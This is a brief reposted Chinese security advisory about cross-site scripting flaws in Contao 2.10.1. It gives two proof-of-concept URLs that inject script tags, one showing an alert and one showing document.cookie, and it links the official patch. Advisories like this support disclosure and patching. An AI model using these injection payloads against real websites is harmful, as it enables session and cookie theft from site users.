作者: Stefan Schurtz www.2cto.com
影响程序: Successfully tested on Contao 2.10.1
开发者网站: http://www.contao.org/
官方补丁: fixed
概述
==========================
Contao 2.10 含多个css缺陷
==================
技术分析
==================
http://www.2cto.com /contao-2.10.1/index.php/teachers. html ?"/><script>alert('
xss')</script>
http://www.2cto.com /contao-2.10.1/index.php/teachers/'"</style></script><scr
ipt>alert(document.cookie)</script>
=========
解决方案:
=========
- 官方补丁- http://dev.contao.org/projects/typolight/repository/revisions/1041
- Release of a new version 2.10.2 next week
查看更多关于Contao 2.10.1跨站脚本缺陷及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11182